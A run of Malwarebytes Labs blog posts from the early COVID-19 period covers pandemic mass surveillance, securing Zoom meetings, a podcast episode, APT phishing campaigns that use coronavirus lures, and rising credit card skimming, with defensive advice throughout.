Last month, the government rolled out a new, voluntary mobile app for citizens to download called TraceTogether. The app relies on Bluetooth signals to detect when a confirmed coronavirus patient comes into close physical proximity with device owners using the same app. It is essentially a high-tech approach to the low-tech detective work of “contact tracing,” in which medical experts interview those with infectious illnesses and determine who they spoke to, what locations they visited, and what activities they engaged in for several days before presenting symptoms.

These examples of increased government surveillance and
tracking are far from exceptional.

According to a Privacy International analysis, at least 23 countries have deployed some form of telecommunications tracking to limit the spread of coronavirus, while 14 countries are developing or have already developed their own mobile apps, including Brazil and Iceland, along with Germany and Croatia, which are both trying to make apps that are GDPR-compliant.

While some countries have relied on telecommunications
providers to supply data, others are working with far more questionable private
actors.

Rapid surveillance demands rapid, shaky infrastructure

Last month, the push to digitally track the spread of coronavirus came not just from governments, but from companies that build potentially privacy-invasive technology.

Last week, Apple and Google announced a joint effort to provide Bluetooth contact tracing capabilities between the billions of iPhone and Android devices in the world.

The two companies promised to update their devices so that public
health experts could develop mobile apps that allow users to voluntarily
identify if they have tested positive for coronavirus. If a confirmed
coronavirus app user comes into close enough contact with non-infected app users,
those latter users could be notified about potential infection, whether they
own an iPhone or Android.

Both Apple and Google promised a privacy-protective
approach. App users will not have their locations tracked, and their identities
will remain inaccessible by Apple, Google, and governments. Further, devices will
automatically change users’ identifiers every 15 minutes, a step towards
preventing identification of device owners. Data that is processed on devices
will never leave a device unless a user chooses to share it.  

In terms of privacy protection, Apple and Google’s approach is one of the better options today.

According to Bloomberg, the Israeli firm NSO Group pitched a variety of governments across the world about a new tool that can allegedly track the spread of coronavirus. As of mid-March, about one dozen governments began testing the technology.

A follow-on investigation by VICE revealed how the new tool, codenamed “Fleming,” actually works:

“Fleming displays the data on what looks like an intuitive user interface that lets analysts track where people go, who they meet, for how long, and where. All this data is displayed on heat maps that can be filtered depending on what the analyst wants to know. For example, analysts can filter the movements of a certain patient by their last location or whether they visited any meeting places like public squares or office buildings. With the goal of protecting people’s privacy, the tool tracks citizens by assigning them random IDs, which the government—when needed—can de-anonymize[.]”

These are dangerous, invasive powers for any government to use against its citizens. The privacy concerns only grow when looking at NSO Group’s recent history. In 2018, the company was sued over allegations that it used its powerful spyware technology to help the Saudi Arabian government spy on and plot the murder of former Washington Post writer and Saudi dissident Jamal Khashoggi. Last year, NSO Group was hit with a major lawsuit from Facebook, alleging that the company sent malware to more than 1,400 WhatsApp users, who included journalists, human rights activists, and government officials.  

The questionable private-public partnerships don’t stop
there.

According to The Wall Street Journal, the facial recognition startup Clearview AI—which claims to have the largest database of public digital likenesses—is working with US state agencies to track those who tested positive for coronavirus.

The New York-based startup has repeatedly boasted about its technology, saying previously that it helped the New York Police Department quickly identify a terrorism suspect. But when Buzzfeed News asked the police department about that claim, it denied that Clearview participated in the case.

Further, according to a Huffington Post investigation, Clearview’s history involves coordination with far-right extremists, one of whom marched in the “Unite the Right” rally in Charlottesville, another who promoted debunked conspiracy theories online, and another who is an avowed Neo-Nazi. One early adviser to the startup once viewed its facial recognition technology as a way to “identify every illegal alien in the country.”

Though Clearview told The Huffington Post that it separated itself from these extremists, its founder Hoan Ton-That appears unequipped to grapple with the broader privacy questions his technology invites. When interviewed earlier this year by The New York Times, Ton-That looked flat-footed in the face of obvious questions about the ability to spy on nearly any person with an online presence. As reporter Kashmir Hill wrote:

“Even if Clearview doesn’t make its app publicly available, a copycat company might, now that the taboo is broken. Searching someone by face could become as easy as Googling a name. Strangers would be able to listen in on sensitive conversations, take photos of the participants and know personal secrets. Someone walking down the street would be immediately identifiable—and his or her home address would be only a few clicks away. It would herald the end of public anonymity.

Asked about the implications of
bringing such a power into the world, Mr. Ton-That seemed taken aback.

“I have to think about that,” he said. “Our belief is that this is the best use of the technology.”

One company’s beliefs about how to “best” use invasive technology is too low a bar for us to build a surveillance mechanism upon.

Should we deploy mass surveillance?

Amidst the current health crisis, multiple digital rights
and privacy organizations have tried to answer the question of whether governments
should deploy mass surveillance to battle coronavirus. What has emerged, rather
than wholesale approvals or objections to individual surveillance programs across
the world, is a framework to evaluate incoming programs.

According to Privacy International and more than 100 similar groups, government surveillance to fight coronavirus must be necessary and proportionate, must only continue for as long as the pandemic, must only be used to respond to the pandemic, must account for potential discrimination caused by artificial intelligence technologies, and must allow individuals to challenge any data collection, aggregation, retention, and use, among other restrictions.

Electronic Frontier Foundation, which did not sign Privacy International’s letter, published a somewhat similar list of surveillance restrictions, and boiled down its evaluation even further to a simple, three-question rubric:  

  • First, has the government shown its surveillance would be effective at solving the problem?
  • Second, if the government shows efficacy, we ask: Would the surveillance do too much harm to our freedoms?
  • Third, if the government shows efficacy, and the harm to our freedoms is not excessive, we ask: Are there sufficient guardrails around the surveillance? (Which the organization detailed here.)

We do not claim keener insight than our digital privacy peers. In fact, much of our research relies on theirs. But by focusing on the types of surveillance installed currently, and past surveillance installed years ago, we err cautiously against any mass surveillance regime developed specifically to track and limit the spread of coronavirus.

Flatly, the rapid deployment of mass surveillance to protect the public has rarely­, if ever, worked as intended. Mass surveillance has not provably “solved” a crisis, and in the United States, one emergency surveillance regime grew into a bloated, ineffective, noncompliant warship, apparently rudderless today.

We should not take these same risks again.

The lessons of Section 215

On October 4, 2001, less than one month after the US
suffered the worst attack on American soil when terrorists felled the World Trade
Center towers on September 11, President George W. Bush authorized the National
Security Agency to collect certain phone content and metadata without first
obtaining warrants.

According to an NSA Inspector General’s working draft report, President Bush’s authorization was titled “Authorization for specified electronic surveillance activities during a limited period to detect and prevent acts of terrorism within the United States.”

In 2006, the described “limited period” powers continued, as Attorney General Alberto Gonzalez argued before a secretive court that the court should retroactively legalize what the NSA had been doing for five years—collecting the phone call metadata of nearly every American, potentially revealing the numbers we called, the frequency we dialed them, and for how long we spoke. The court later approved the request.

The Attorney General’s arguments partially cited a separate law passed by Congress in 2001 that introduced a new surveillance authority for the NSA titled Section 215, which allows for the collection of “call detail records,” which are logs of phone calls, but not phone call content. Though Section 215 received significant reforms in 2015, it lingers today. Only recently has the public learned about collection failures under its authority.

In 2018, the NSA erased hundreds of millions of call and text detail records collected under Section 215 because the NSA could not reconcile their collection with the actual requirements of the law. In February, the public also learned that, despite collecting countless records across four years, only twice did the NSA uncover information that the FBI did not already have. Of those two occasions, only once did the information lead to an investigation.

Complicating the matter is the fact that the NSA shut down the call detail record program in the summer of 2019, but the program’s legal authority remains in limbo, as the Senate approved a 77-day extension in mid-March, but the House of Representatives is not scheduled to return to Congress until early May.

If this sounds frustrating, it is, and Senators and Representatives
on both sides have increasingly questioned these surveillance powers.

Remember, this is how difficult it is to dismantle a surveillance machine with proven failures. We doubt it will be any easier to dismantle whatever regime the government installs to fight coronavirus.

Separate from our recent history of over-extended surveillance is the matter of whether data collection actually works at tracking and limiting coronavirus.

So far, results range from unclear to mixed.

The problems with location and proximity tracking

In 2014, government officials, technologists, and humanitarian groups installed large data collection regimes to track and limit the spread of the Ebola outbreak in West Africa.

Harvard’s School of Public Health used cell phone “pings” to chart rough estimates of callers’ locations based on the cell towers they connected to when making calls. The US Centers for Disease Control and Prevention similarly looked at cell towers which received high numbers of emergency phone calls to determine whether an outbreak was occurring in near real-time.

But according to Sean McDonald of the Berkman Klein Center
for Internet and Society at Harvard University, little evidence exists to show
whether location tracking helps prevent the spread of illnesses at all.

In a foreword to his 2016 paper “Ebola: A big data disaster,” McDonald analyzed South Korea’s 2014 response to Middle East Respiratory Syndrome (MERS), a separate coronavirus. To limit the spread, the South Korean government grabbed individuals’ information from the country’s mobile phone providers and implemented a quarantine on more than 17,000 people based on their locations and the probabilities of infection.

But the South Korean government never opened up about how it
used citizens’ data, McDonald wrote.

“What we don’t know is whether that seizure of information
resulted in a public good,” McDonald wrote. “Quite the opposite, there is
limited evidence to suggest that migration or location information is a useful
predictor of the spread of MERS at all.”

Further, recent efforts to provide contact tracing through
Bluetooth connectivity—which is notthe same as location tracking—have
not been tested on a large enough scale to prove effective.

According to a mid-March report from The Economist, just 13
percent of Singapore’s population had installed the country’s contact tracing
app, TraceTogether. The low number looks worse when gauging the success in
fighting coronavirus.

According to The Verge, if Americans installed a Bluetooth contact tracing app at the same rate Singaporeans, the likelihood of being notified because a chance encounter with another app-user would be just 1.44 percent.  

Worse, according to Dr. Farzad Mostashari, former national
coordinator for health information technology at the Department of Health and
Human Services, Bluetooth contact tracing could create many false positives. As
he told The Verge:

“If I am in the wide open, my
Bluetooth and your Bluetooth might ping each other even if you’re much more
than six feet away. You could be through the wall from me in an apartment, and
it could ping that we’re having a proximity event. You could be a on a
different floor of the building
 and it could ping.”

This does not mean Bluetooth contact tracing is a bad idea, but it isn’t the silver bullet some imagine. Until we even know if location tracking works, we might assume the same.

Stay safe

Today is exhausting, and, sadly, tomorrow will be, too. We
don’t have the answers to bring things back to normal. We don’t know if those
answers exist.

What we do know is that, understandably, now is a time of
fear. That is normal. That is human.

But we should avoid letting fear dictate decisions with such significance as this. In the past, mass surveillance has grown unwieldy, lasted longer than planned, and proved ineffective. Today, it is being driven by opportunistic private actors who we should not trust as the sole gatekeepers to expanded government powers.

We have no proof that mass surveillance alone will solve this crisis. Only fear lets us believe it will.

The post Mass surveillance alone will not save us from coronavirus appeared first on Malwarebytes Labs.

Keep Zoombombing cybercriminals from dropping a load on your meetings

While shelter in place has left many companies struggling to stay in business during the COVID-19 epidemic, one company in particular has seen its fortunes rise dramatically. Zoom, the US-based maker of teleconferencing software, has become the web conference tool of choice for employees working from home (WFH), friends coming together for virtual happy hour, and families trying to stay connected. Since March 15, Zoom has occupied the top spot on Apple’s App Store. Only one week prior, Zoom was the 103rd-most popular app. 

Even late-night talk show hosts have jumped on the Zoom bandwagon, with Samantha Bee, Stephen Colbert, Jimmy Fallon, and Jimmy Kimmel using a combination of Zoom and cellphone video to produce their respective shows from home. 

In an incredibly zeitgeisty moment, everyone and their parents are Zooming. Unfortunately, opportunistic cybercriminals, hackers, and Internet trolls are Zooming, too.

What is Zoombombing?

Since the call for widespread sheltering in place, a number of security exploits have been discovered within the Zoom technology. Most notably, a technique called Zoombombing has risen in popularity, whether for pure mischief or more criminal purpose.

Zoombombing, also known as Zoom squatting, occurs when an unauthorized user joins a Zoom conference, either by guessing the Zoom meeting ID number, reusing a Zoom meeting ID from a previous meeting, or using a Zoom ID received from someone else. In the latter case, the Zoom meeting ID may have been shared with the Zoombomber by someone who was actually invited to the meeting or circulated among Zoombombers online.  

The relative ease by which Zoombombing can happen has led to a number of embarrassing and offensive episodes.

In one incident, a pornographic video appeared during a Zoom meeting hosted by a Kentucky college. During online instruction at a high school in San Diego, a racist word was typed into the classroom chat window while another bomber held up a sign that said the teacher “Hates Black People.” And in another incident, a Zoombomber drew male genitalia on screen while a doctoral candidate defended his dissertation.

Serious Zoombombing shenanigans

The Zoombombing problem has gotten so bad that the US Federal Bureau of Investigations has issued a warning.

That said, it’s the Zoombombs that no one notices that are most worrying, especially for Zoom’s business customers. Zoombombers can discreetly enter a Zoom conference and capture screenshots of confidential screenshares and record video and audio from the meeting. While it’s not likely for a Zoom participant to put up a slide with their username and password, the information gleaned from a Zoom meeting can be used in a phishing or spear phishing attack.

As of right now, there hasn’t been a publicly disclosed data breach as a result of a Zoombomb, but the notion isn’t far-fetched.

Numerous organizations and educational institutions have announced they will no longer be using Zoom. Of note, Google has banned the use of Zoom on company-owned devices in favor of their own Google Hangouts. The New York City Department of Education announced they’d no longer be using Zoom for remote learning. And Elon Musk’s SpaceX has banned Zoom, noting “significant privacy and security concerns” in a company-wide memo.

“Most Zoombombing incidents can be prevented with a little due diligence on the part of the user,” Malwarebytes Head of Security John Donovan said. “Anyone using Zoom, or any web conference software for that matter, is strongly encouraged to review their conference settings and minimize the permissions allowed for their conference attendees.”

“You can’t walk into a high school history class and start heckling the teacher. Unfortunately, the software lets people do that if you’re not careful,” he added.

For their part, Zoom has published multiple blog posts acknowledging the security issues with their software, changes the company has made to shore up security, and tips for keeping conferences private.

How to schedule a Meeting in Zoom, safely.
Set your meeting ID to generate automatically and always require a password.

Keep your Zoom meetings secure

Here are our tips for keeping your Zoom meetings secure and free from Zoombombers. Keep in mind that many of these tips apply to other teleconferencing tools as well. 

  1. Generate a unique meeting ID. Using your personal ID for meetings is like having an open-door policy—anyone can pop in at any time. Granted, it’s convenient and easy to remember. However, if a Zoombomber successfully guesses your personal ID, they can drop in on your meetings whenever they want or even share your meeting ID with others.
  2. Set a password for each meeting. Even if you have a unique meeting ID, an invited participant can still share your meeting ID with someone outside your organization. Adding a password to your meeting is one more layer of security you can add to keep interlopers out.
  3. Allow signed-in users only. With this option, it won’t matter if Zoombombers have the meeting ID—even the password. This setting requires everyone to be signed in to Zoom using the email they were invited through.
  4. Use the waiting room. With the waiting room, the meeting doesn’t start until the host arrives and adds everyone to the meeting. Attendees in the waiting room can’t communicate with each other while they’re in the waiting room. This gives you one additional layer of manual verification, before anyone can join your meeting.
  5. Enable the chime when users join or leave the meeting. Besides giving you a reason to embarrass late arrivals, the chime ensures no one can join your meeting undetected. The chime is usually on by default, so you may want to check to make sure you haven’t turned it off in your settings.
  6. Lock the room once the meeting has begun. Once all expected attendees have joined, lock the meeting. It seems simple, but it’s another easy way to keep Zoombombing at bay.
  7. Limit screen sharing. Before the meeting starts, you can restrict who can share their screen to just the host. And during the meeting, you can change this setting on the fly, in case a participant ends up needing to show something.

A special note for IT administrators: As a matter of company policy, many of these Zoom settings can be set to default. You can even further lock down settings for a particular group of users with access to sensitive information (or those with a higher learning curve on cybersecurity hygiene). For more detailed information, see the Zoom Help Center.

Remember, Zoombombing isn’t just embarrassing—it’s a big security risk. Sure, the Zoombombing incidents making headlines at the moment seem to be about trolling people more than anything else, but the potential for more serious abuse exists.

No matter which web conferencing software you use, take a moment to learn its settings and make smart choices about the data you share in your meetings. Do this, and you’ll have a safe and happy socially-distanced gathering each time you sign on.

The post Keep Zoombombing cybercriminals from dropping a load on your meetings appeared first on Malwarebytes Labs.

Lock and Code S1Ep4: coronavirus and responding to computer viruses with Akshay Bhargava

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Akshay Bhargava, Chief Product Officer of Malwarebytes, about the similarities between coronavirus and computer viruses. We discuss computer virus prevention, detection, and response, and the simple steps that consumers and businesses can take today to better protect themselves from a spreading cyberattack.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research on:

Plus other cybersecurity news:

Stay safe, everyone!

The post Lock and Code S1Ep4: coronavirus and responding to computer viruses with Akshay Bhargava appeared first on Malwarebytes Labs.

APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure

The coronavirus (COVID-19) has become a global pandemic, and this is a golden time for attackers to take advantage of our collective fear to increase the likelihood of successful attack. True to form, they’ve been doing just that: performing spam and spear phishing campaigns using coronavirus as a lure for government and non-government entities.

From late January on, several cybercriminal and state-sponsored advanced persistent threat (APT) groups have been using coronavirus-based phishing as their infection vector to gain a foothold on victim machines and launch malware attacks. Just like the spread of coronavirus itself, China was the first targeted by APT groups and as the virus spread worldwide, so did the attacks. 

In the following paper, we provide an overview of APT groups that have been using coronavirus as a lure, and we analyze their infection techniques and eventual payloads. We categorize the APT groups based on four different attack vectors used in COVID-19 campaigns: Template injection, Malicious macros, RTF exploits, and malicious LNK files.

You can view the full report on APTs using COVID-19 HERE.

Attack vectors

  • Template injection: Template injection refers to a technique in which the actors embed a script moniker in the lure document that contains a link to a malicious Office template in the XML setting. Upon opening the document, the remote template is dropped and executed. The Kimsuky and Gamaredon APTs used this technique.
  • Malicious macros: Embedding malicious macros is the most popular method used by threat groups. In this technique, a macro is embedded in the lure document that will be activated upon opening. Konni (APT37), APT36, Patchwork, Hades, TA505, TA542, Bitter, APT32 (Ocean Lotus) and Kimsuky are the actors using this technique.
  • RTF exploits: RTF is a flexible text format that allows embedding any object type within and makes RTF files vulnerable to many OLEl object-related vulnerabilities. Several Chinese threat actors use RTF files, among them the Calypso group and Winnti.
  • Malicious LNK files: An LNK file is a shortcut file used by Microsoft Windows and is considered as a Shell item type that can be executed. Mustang Panda is a Chinese threat actor that uses this technique to drop either a variant of the PlugX RAT or Cobalt Strike into victims’ machines. Higaisia is a North Korean threat group that also uses this method.

We expect that in the coming weeks and months, APT threat actors will continue to leverage this crisis to craft phishing campaigns using the techniques mentioned in the paper to compromise their targets.

The Malwarebytes Threat Intelligence Team is monitoring the threat landscape and paying particular attention to attacks trying to abuse the public’s fear around the COVID-19 crisis. Our Malwarebytes consumer and business customers are protected against these attacks, thanks to our multi-layered detection engines.

The post APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure appeared first on Malwarebytes Labs.

Online credit card skimming increased by 26 percent in March

Crisis events such as the current COVID-19 pandemic often lead to a change in habits that captures the attention of cybercriminals. With the confinement measures imposed in many countries, for example, online shopping has soared and along with it, credit card skimming. According to our data, web skimming increased by 26 percent in March over the previous month.

While this might not seem like a dramatic jump, digital credit card skimming was already on the rise prior to COVID-19, and this trend will likely continue into the near future.

While many merchants remain safe despite the increased volume in processed transactions, the exposure to compromised e-commerce stores is greater than ever.

Change in habits translates into additional web skimming attempts

Web skimming, also known under different terms, but made popular thanks to the ‘Magecart’ moniker, is the process of stealing customer data, including credit card information, from compromised online stores.

We actively track web skimmers so that we can protect our customers running Malwarebytes or Browser Guard (the browser extension) when they shop online.

The stats presented below exclude any telemetry from our Browser Guard extension and reflect a portion of the overall web skimming landscape, per our own visibility. For instance, server-side skimmers will go unaccounted for, unless the merchant site itself has been identified as compromised and is blacklisted.

One trend that we have noticed for a while is how the number of skimming blocks is at its highest on Mondays, lowering down in the second half of the week and being at its lowest point on week-ends.

stat1

The second observation is how the number of web skimming blocks increased moderately from January to February (2.5%) but then started to go up from February to March (26%). While this is still a moderate increase, we believe it marks a trend that will be more apparent in the coming months.

stat2

The final chart shows that we record the most skimming attempts in the US, followed by Australia and Canada. This trend coincides with the quarantine measures that began being rolled out in mid March.

stat3

Minimizing risks: a shared responsibility

As we see with other threats, there isn’t one answer to mitigate web skimming. In fact, it can be fought from many different sides starting with online merchants, the security community and shoppers themselves.

A great number of merchants do not keep their platforms up to date and also fail to respond to security disclosures. Often times, the last recourse to report a breach is to go public and hope that the media attention will bear fruit.

Many security vendors actively track web skimmers and add protection capabilities into their products. This is the case with Malwarebytes, and web protection is available in both our desktop product and browser extension. Sharing our findings and attempting to disrupt skimming infrastructure is effective at tacking the problem at scale, rather than on an individual (per site) basis.

Shopping online is convenient but not risk-free. Ultimately, users are the ones who can make savvy choices and avoid many pitfalls. Here are some recommendations:

  • Limit the number of times you have to manually enter your credit card data. Rely on platforms where that information is already stored in your account or use one-time payment options.
  • Check if the online store displays properly in your browser, without any errors or certain red flags indicating that it has been neglected.
  • Do not take trust seals or other indicators of confidence at face value. Because a site displays a logo saying it’s 100% safe does not mean it actually is.
  • If you are unsure about a site, you can use certain tools to scan it for malware or to see if it’s already on a blacklist.
  • More advanced users may want to examine a site’s source code using Developer Tools for instance, which as a side effect may turn off a skimmer noticing it is being checked.

We expect web skimming activity to keep on an upward trend in the coming months as the online shopping habits forged during this pandemic continue on well beyond. For more tips please check out Important tips for safe online shopping post COVID-19.

The post Online credit card skimming increased by 26 percent in March appeared first on Malwarebytes Labs.